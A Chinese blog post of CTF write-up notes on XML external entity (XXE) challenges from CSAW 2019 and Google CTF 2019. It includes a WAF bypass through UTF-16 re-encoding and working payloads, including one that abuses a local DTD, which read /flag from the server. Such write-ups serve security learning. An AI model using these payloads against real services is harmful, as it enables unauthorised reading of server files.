XXE题型记录
2024-09-01 04:27:40
XXE题型记录
[CSAWQual 2019]Web_Unagi
题解
打开题目,点开upload中的例子发现是上传xml文件
根据about中的提示Flag is located at /flag, come get it
先构造常规的xml文件上传发现被WAF,用utf-16绕过
cat rat.xml | iconv -f UTF-8 -t UTF-16BE > rbt16.xml
<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag" >]>
<users>
<user>
<username>gg</username>
<password>passwd1</password>
<name>ggg</name>
<email>alice@fakesite.com</email>
<group>CSAW2019</group>
<intro>&xxe;</intro>
</user>
<user>
<username>bob</username>
<password>passwd2</password>
<name> Bob</name>
<email>bob@fakesite.com</email>
<group>CSAW2019</group>
<intro>&xxe;</intro>
</user>
</users>
上传rbt16.xml在User得到flag
end
[GoogleCTF2019 Quals]Bnv
学习资料
2.write-up
题解
当Web应用采用JSON进行数据传输时,可能存在XXE漏洞。
(第二个油管视频有整个题目的解题思路和过程,看着做的就不照搬了=w=)
Payload
<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'test%file;'>">
%eval;
%error;
'>
%local_dtd;
]>
最新文章
- wpf button的mouse(leftbutton)down/up,click事件不响应解决办法
- DDNS -VPN设置方法
- String对象的方法
- [转]iOS技巧之获取本机通讯录中的内容,解析通讯录源代码
- iOS复杂动画之抽丝剥茧(Objective-C & Swift)
- web及移动应用测试知识总结
- 去除List集合中的重复对象,Map遍历代码
- js基础第二天
- 关于工作流之最后Assign给TeamLeader
- C#读写共享文件夹
- sql 表名为关键字
- stl入门--reverse函数
- linux使用FIO测试磁盘的iops
- 【爆料】-《南昆士兰大学毕业证书》USQ一模一样原件
- Arrays和String单元测试(课下作业,选做)
- WMS程序部署
- Spring——事务
- PHP – 在类中使用array_filter时回调函数的问题
- oracle 11g 安装及netca,dbca乱码之解决
- shell命令输出
热门文章
- 【论文笔记】Leveraging Post-click Feedback for Content Recommendations
- python获取命令行传参的两种种常用方法argparse解析getopt 模块解析
- JAVA实现导出excel功能,封装通用导出工具类
- c(++)可变参数之格式化字符串
- 【LeetCode】155. Min Stack 最小栈 (Python&C++)
- Joseph(hdu1443)
- 魔法串(hud4545)
- Docker 与 K8S学习笔记(六)—— 容器的资源限制
- Windows 11实现直播,VLC超简单实现捕获、串流、播放
- 单芯片替代PS176 DP转HDMI 4K60HZ DP转HDMI2.0转换芯片CS5263